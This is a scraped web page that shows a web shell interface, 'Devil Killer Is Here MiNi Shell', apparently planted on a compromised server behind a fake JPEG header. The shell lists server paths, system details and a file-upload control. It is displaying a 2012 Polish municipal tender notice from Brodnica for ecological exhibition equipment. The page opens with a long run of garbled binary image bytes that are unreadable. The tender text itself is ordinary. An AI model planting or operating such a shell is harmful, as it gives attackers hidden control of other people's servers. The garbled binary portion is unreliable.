JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120801/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120801/167081-N-2012.html

<p class="kh_header"><b>Brodnica: DOSTAWA ELEMENTÓW EKSPOZYCJI DO PROJEKTU UTWORZENIE CENTRUM EDUKACJI EKOLOGICZNEJ W XVII WIECZNYM SPICHLERZU W BRODNICY</b><br>
<b>Numer ogłoszenia: 167081 - 2012; data zamieszczenia: 01.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Brodnicy , ul. Kamionka 23, 87-300 Brodnica, woj. kujawsko-pomorskie, tel. 056 4930300, faks 056 4982626.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brodnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA ELEMENTÓW EKSPOZYCJI DO PROJEKTU UTWORZENIE CENTRUM EDUKACJI EKOLOGICZNEJ W XVII WIECZNYM SPICHLERZU W BRODNICY.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa elementów ekspozycji do projektu Utworzenie Centrum Edukacji Ekologicznej w XVII wiecznym spichlerzu w Brodnicy.
2. Przedmiot zamówienia obejmuje dostawę elementów ekspozycji do projektu wskazanego w nazwie. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1.1 do SIWZ Załącznik nr 1.1 do formularza ofertowego.
3. 	Zamawiający wymaga od Wykonawcy gwarancji (określonej w załączniku nr 1.1 do formularza ofertowego) na dostarczone elementy ekspozycji będące przedmiotem umowy, od daty dostarczenia do miejsca wskazanego przez Zamawiającego.
4. 	Przy określeniu przedmiotu zamówienia Zamawiający posłużył się w niektórych przypadkach symbolem, nazwą producenta. Symbol, nazwa, opisane wymagania wobec elementów ekspozycji mają jedynie na celu precyzyjne określenie przedmiotu zamówienia, dopuszczając jednocześnie składanie ofert o parametrach równoważnych.
5. Zamawiający dopuszcza zaoferowanie produktów równoważnych, pod warunkiem, iż oferowany sprzęt, elementy ekspozycji będzie zgodny z opisem Zamawiającego pod względem wszystkich parametrów technicznych oraz wymagań jakościowych. W przypadku wątpliwości Zamawiającego, co do zaoferowanego przez Wykonawcę przedmiotu zamówienia, to na Wykonawcy ciążyć będzie obowiązek udokumentowania spełniania niniejszych warunków. Parametry zaoferowanego sprzętu, elementów ekspozycji nie mogą być gorsze jakościowo niż parametry przedmiotu zamówienia wskazanego przez Zamawiającego. 
6. 	Oferowany sprzęt, elementy ekspozycji musi być fabrycznie nowy, najwyższej jakości. Termin fabrycznie nowy użyty powyżej oznacza, iż wszystkie elementy, z których wyprodukowano przedmiot zamówienia nie były wcześniej używane.
7. Jeżeli dostarczony przedmiot zamówienia będzie uszkodzony, zamawiający ma prawo je zwrócić do Wykonawcy. Wykonawca dostarczy w zamian sprawny produkt w czasie 4 dni od daty otrzymania reklamacji. Reklamacja może być zgłaszana przez Zamawiającego drogą telefoniczną lub faksem.
8.   Dostawa będzie kontrolowana przez Zamawiającego.
9.  Wykonawca dostarczy towar własnym transportem, na własny koszt, w sposób zapewniający ich całość i nienaruszalność, w miejsce wskazane przez Zamawiającego.
10.  Szczegółowy opis przedmiotu zamówienia:

Akwarium z oprzyrządowaniem,   Akwarium o wymiarach 250/70/67 1172 litry  z wklejonymi kominami przelewowymi, obydwa akwaria miałyby jeden spójny filtr  z chłodziarką obsługującą obydwa zestawy Jest tylko jeden zasadniczy warunek, jakość, parametry i temperatura wody muszą być spójne w obydwu akwariach.
 Wyposażenie dodatkowe pompa powietrza dwudyszna z osprzętem, cyrkulatory wymuszające obieg wody w akwarium ( efekt rzeki) pompa obiegowa główna 10 000 l/h, przepływ pompy podzielony pomiędzy obydwa zbiorniki z bardzo precyzyjna i płynna regulacją zaworami oraz potencjometrem.
 Stelaże spawane z profili zabudowane estetyczną płytą meblową melaminową z płyty 1,8 cm,  w dowolnym kolorze.
Roślinność rzeczna i jeziorowa polskich wód.
Podłoże kolorystyka  czarne lub brązowe, ewentualnie śnieżnobiały piach imitujący łachy rzeczne 200 kg
Ozdobne korzenie polskiego pochodzenia dąb, akacja, olsza, brzoza 10 szt. różnych rozmiarów
 Montaż z podłączeniem wszystkich systemów i hydrauliki wraz z aranżacją wnętrza akwarium, stylizacja do wyboru polskie jezioro lub rzeka.
Ozdobne Skały 250 kg
Oświetlenie zbiorników 4 x 39 wat  plus 4 x 54 wat t 5, odbłyśniki kierunkowe oraz  8 listew LED o odpowiednich temperaturach barwowych - pierwsze akwarium,
  3 x 150 wat HQI z żarnikami o odpowiedniej temperaturze barwowej - drugie akwarium.
 Zasilanie 230 volt, obciążenie około 1kW przy pełnej mocy, zabezpieczenie różnicowe.
 Mile widziany spływ do kanalizy i zasilanie zimną wodą do automatyki uzupełniającej odparowany stan wody. 
Gwarancja szczelności akwarium: 10 lat
lub równoważne, 2 zestawy
Kiosk informacyjny, Obudowa:
 wersja stojąca, obudowa oparta na konstrukcji stalowej (stal inox - nierdzewna szlifowana)
	konstrukcja obudowy zapewnia bezproblemowy dostęp do urządzeń w jej wnętrzu oraz ich odpowiednią wentylację a także uniemożliwia niepowołany dostęp do jednostki sterującej 
	powierzchnia korpusu kiosku lekko wypukła
	maksymalna szerokość korpusu 400mm
	łatwy dostęp dla administratora (drzwi kiosku otwierane z tyłu) 
	maksymalna wysokość całkowita kiosku z trwale zamocowanym monitorem 1300mm 
	podstawa kiosku ciężka, stabilna, płaska, zabezpieczająca urządzenie przed wywróceniem,
	kolorystyka kiosku: do uzgodnienia z Zamawiającym, 
	na froncie umieszczone Logo lub napis wybrany przez Zamawiającego, logo wycinane w obudowie laserowo, od środka wklejone logo przestrzenne i podświetlone 

Monitor:
monitor 32 LCD nie gorszy niż Samsung 320MX
	nakładka dotykowa w technologii fali powierzchniowej SAW, odporna na zadrapania i zarysowanie 
	wytrzymałość - 7 w skali Mohsa
obudowa monitora wyoblona (lekko zaokrąglone boki)

Jednostka sterująca kioskiem:
komputer o parametrach nie gorszych niż: wydajność komputera w teście Average CPU Mark (CPU Benchmarks) min. 302 pkt, pamięć minimum 2 GB DD RAM, dysk 500 GB, karta sieciowa 10/100/1000, karta muzyczna zintegrowana z płytą główną, USB, głośniki, 
	komputer zamknięty w specjalnym bezpiecznym chassis, Chassis -  wykonane z aluminium, pokrywa chassis malowana proszkowo, otwory na wentylatory. 
	wszystkie komponenty rozmieszczone modułowo (łatwy dostęp)

Oprogramowanie:
system operacyjny: Win 7 Home   lub równoważne

	oprogramowanie zarządzająco - sterujące kioskiem (opis możliwości oprogramowania poniżej).

OPROGRAMOWANIE ZARZĄDZAJĄCO - STERUJĄCE O NASTĘPUJĄCEJ FUNKCJONALNOŚCI:
	Zaprogramowanie ustawień kiosku przy starcie (rozdzielczość ekranu, liczba kolorów, wstępna głośność) oraz restarcie;
	Zabezpieczenie dostępu do ustawień i konfiguracji hasłem;
	Możliwość automatycznego wyłączania komputera o określonej godzinie;
	Wyświetlenie menu umożliwiającego użytkownikowi wybór zaprogramowanych funkcji kiosku multimedialnego, jak również wyświetlenie i przywołanie tego menu w dowolnym momencie funkcjonowania z możliwością modyfikacji wyglądu menu;
Możliwość zablokowania klawiszy krytycznych dla pracy Windows takich jak: CTRL+ ALT+DEL, Windows - Logo, ALT+TAB,Shift+F10, CTRL+ESC, ALT+ESC;
	Kontrolowanie systemu okien w celu zablokowania okien określonego typu lub zamknięcia określonych okien, które znalazły się w tle;
	Współpraca z Internet Explorer (przeglądarka);
	Możliwość wymuszenia wyświetlenia wybranej strony WWW w przeglądarce poprzez wybranie pozycji menu, ew. przycisku funkcyjnego na klawiaturze, jak również przy starcie/restarcie kiosku multimedialnego;
	Możliwość blokowania dostępu do stron WWW dostępnych poprzez sieć i ograniczenia dostępu wyłącznie do określonych lokalnych dokumentów;
	Definiowanie ustawień wpływających na bezpieczeństwo pracy kiosku (ograniczanie dostępu do różnych rodzajów zasobów: filmy, skrypty;
	Definiowanie stron WWW i adresów dostępnych  oraz zablokowanych do przeglądania;
	Definiowanie programów dostępnych do uruchomienia przez użytkownika kiosku;
	Zarządzanie wydrukami monitorowanie drukarek i wydruków
	Automatyczne zamykanie otwartych okien i programów w wypadku braku reakcji użytkownika przez zaprogramowany czas z możliwością uruchomienia pokazu slajdów zamiast wygaszacza ekranu;
	Definiowalna klawiatura ekranowa pełna lub numeryczna
	Klient poczty pop3/imap do przeglądania on-line podanej przez użytkownika skrzynki pocztowej (z wykluczeniem możliwości trwałego zapisywania zawartości skrzynki - treści poczty i załączników oraz uruchamiania jako programów załączników i ich treści.
Cena ofertowa musi zawierać dostawę i uruchomienie kiosków informacyjnych  w wyznaczonych miejscach, konfigurację oprogramowania  zarządzającego oraz przeszkolenie wytypowanych pracowników   obsługi oprogramowania.
Gwarancja: minimum 24 m-ce, 4 sztuki
Gabloty ekspozycyjne, Gablota o następujących parametrach: G-13 - 24 szt konstrukcja profile aluminiowe anodowane
-oświetlenie halogenowe
-płyta laminowana
-szkło bezpieczne
-100x200x40cm
-część przeszklona zamykana
-plecy z lustra
-front wieńca podświetlany góra, dół - biała pleksi LOGO
Gwarancja: minimum  24 m-ce
lub równoważne
Gablota o następujących parametrach: GB 6 - 12 szt
-pionowe słupki - profil aluminiowy anodowany 
-3 półki szklane 6mm
-dolna szafka zamykana 
-cześć przeszklona zamykana
-oświetlenia halogenowe prętowe
-płyta laminowana
-szkło bezpieczne
50x190x45cm
Gwarancja: minimum 24 m-ce
lub równoważne
Gablota o następujących parametrach: LN 02 - 6 szt
-konstrukcja - profile aluminiowe anodowane
-50x90x50cm
-2 półki szklane 6mm
-blat szklany 6mm
-zamykana
-szkło bezpieczne
            dół płyta laminowana
Gwarancja: minimum 24 m-ce
lub równoważne
Oświetlenie - lampy, Lampy specjalistyczne oświetlenie ekspozycyjne
Reflektory ledowe:
Reflektory z możliwością  indywidualnego ściemniania na oprawie 100-3%( onboard dimming ),
Brak promieniowania UV  i podczerwieni,
Współczynnik oddawania  barw CRI 90-95
Temperatura barwowa  3000K,

 reflektory Typu A z kątem 30 stopni, 20 szt
  reflektory Typu B z regulacją kąta  świecenia do 60 stopni, 6 szt
  reflektory akcentujące Typu C z kątem 30 stopni, 6 szt
 szynoprzewód  trójobwodowy, 32 mb
Gwarancja: minimum 24 m-ce
lub równoważne
Realizacja filmów wykorzystywanych w ekspozycji, Przygotowanie i realizacja 3 różnych filmów popularnonaukowych ilustrujących i rozwijających tematykę ukazaną na wystawie,  zgodnych merytorycznie z opisem zawartym w scenariuszu ekspozycji i przedstawiających m.in. tematykę związaną z florą, fauną naszego regionu i zróżnicowanie środowiska przyrodniczego pojezierza brodnickiego.
Długość  filmu max. 15 minut, nośnik  pendrive, możliwość otwierania filmu na dowolnym odtwarzaczu DVD.
lub równoważne, 3 szt
Rzutnik multimedialny, Rozdzielczość: min. WXGA 1280x800 
Jasność: min. (STD/ECO) 2000 ANSI Lumenów min. 1460 ANSI Lumenów 
Kontrast: min. 500 : 1 
Głośność (STD/ECO): max. 38 dB / 31 dB
Kompatybilność komputerowa:  UXGA, SXGA, SXGA+, WXGA, XGA, SVGA, VGA, Mac Kompatybilność wideo Pal, Pal-M, Pal-N, SECAM, NTSC, NTSC4.43  
Korekcja trapezu: pionowa +/- 20 stopni 
Rodzaje projekcji: przednia, tylna, przednia sufitowa, tylna sufitowa.
Żywotność lampy (STD/ECO): min.1500 h / 3000 h
Gwarancja na urządzenie oraz lampę: minimum 36 m-cy
lub równoważne, 1 szt
Opracowanie edukacyjnego programu komputerowego, Opracowanie dla każdego kiosku programu edukacyjnego mającego na celu m.in. zilustrowanie bogactwa gatunków flory, fauny i środowiska przyrodniczego regionu z dostosowaniem w zależności od grup wiekowych i ich potrzeb.
lub równoważne, 4 szt
Wydruki wielkoformatowe do budowy dioram-zdjęcia na ekspozycje, Tła i zdjęcia do budowy dioram ilustrujących ekspozycję i stworzenie dioram prezentujących 5 środowisk przyrodniczych.
Szerokość dioram   1,5 m, wysokość  2,0 m
Siedliska do dioram

	Las mieszany 
	Łąka naturalna (nadrzeczna)
	Dolina rzeczna -na przykładzie Bagiennej Doliny Drwęcy -( zarośla wierzbowe )
	Koryto rzeki (na przykładzie Drwęcy)
	Ols
Przejście między siedliskami:
Las mieszany  ols  koryto rzeki dolina  rzeczna - łąka naturalna
lub równoważne, 5 szt.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.29.80.00-7, 39.29.88.00-5, 30.00.00.00-9, 30.20.00.00-1, 30.23.10.00-7, 30.21.00.00-4, 48.00.00.00-8, 48.70.00.00-5, 48.78.00.00-9, 30.21.10.00-1, 39.10.00.00-3, 39.15.00.00-8, 39.15.40.00-6, 39.15.41.00-7, 31.50.00.00-1, 31.52.00.00-7, 31.52.10.00-4, 31.52.70.00-6, 32.00.00.00-3, 32.32.00.00-2, 32.32.10.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Doświadczenie zawodowe - wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, co najmniej jednej (1) dostawy w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Wykonawca musi wykazać, że wykonał lub wykonuje, co najmniej jedno (1) zadanie o charakterze i złożoności porównywalnej z przedmiotem zamówienia tj., w zakresie dostawy elementów ekspozycji wskazanych w opisie przedmiotu zamówienia, przy czym wartość tego pojedynczego zamówienia winna wynosić, co najmniej 10.000,00 PLN brutto. Należy podać ich wartość, przedmiot oraz daty wykonania i odbiorców oraz załączyć dokumenty potwierdzające, że te dostawy zostały wykonane lub są wykonywane należycie - wg załącznika Nr 7 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy wraz z załącznikiem - wg załącznika Nr 1 i 1.1 do SIWZ.
	Oświadczenie w trybie art. 22 ust.1 od pkt 1 do pkt 4, art. 24 ust. 1 pkt 1-11 oraz art. 24 ust. 2 na podstawie ustawy z dnia 29 stycznia 2004r z poźn. zmianami - Prawo zamówień publicznych - wg załącznika Nr 2 do SIWZ.
	Oświadczenie o akceptowaniu warunków określonych w SIWZ i nie zgłaszaniu zastrzeżeń, co do przedmiotu zamówienia - wg załącznika Nr 3 do SIWZ.
	Informacje ogólne o wykonawcy - wg załącznika Nr 4 do SIWZ.
	Zaparafowany projekt umowy - wg załącznika Nr 5 do SIWZ. 
	Oświadczenie, iż przedmiot zamówienia jest fabrycznie nowy oraz posiada wymagane prawem normy, deklaracje oraz certyfikaty - wg załącznika Nr 6 do SIWZ.
 	W przypadku ofert równoważnych - należy dołączyć deklaracje, certyfikaty, specyfikację techniczną oraz informacje o produkcie w formie opisu lub ulotki w języku polskim, zawierające wszystkie dane potwierdzające, że przedmiot zamówienia spełnia wymogi określone w SIWZ.
	Dotyczy akwarium, kiosków informacyjnych i gablot - należy dołączyć kolorową wizualizację lub kolorowe zdjęcie oferowanego urządzenia celem sprawdzenia spójności z opisem przedmiotu zamówienia w specyfikacji istotnych warunków zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega możliwość zmiany zawartej umowy w stosunku do treści oferty na mocy art. 144 ust. 1 ustawy - Prawo zamówień publicznych. 
Zamawiający określa następujące warunki, w jakich dopuszcza możliwość dokonania zmian niniejszej umowy:
1.)	konieczności zmiany umownego terminu realizacji zamówienia z powodu:
a)	działania siły wyższej, przez którą rozumieć należy zdarzenie zewnętrzne o charakterze niezależnym od stron, którego strony nie mogły przewidzieć przed zawarciem umowy, którego nie można uniknąć, ani któremu strony nie mogły zapobiec przy zachowaniu należytej staranności, której nie można przypisać drugiej stronie. Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia,
b)	zaistnienia okoliczności leżących po stronie zamawiającego, w szczególności spowodowanych problemami z jego zdolnością płatniczą lub warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy,
2.)	z powodu zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron,
3.)	z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez zamawiającego lub wykonawcę, jeżeli te zmiany są korzystne dla zamawiającego;
4.)	z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron.
O wystąpieniu okoliczności mogących wpłynąć na zmianę terminów Wykonawca winien jest poinformować Zamawiającego pisemnie. 
       Każdorazowa zmiana umowy będzie potwierdzona pisemnie, czyli stosownym aneksem.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.brodnica.pl<br>
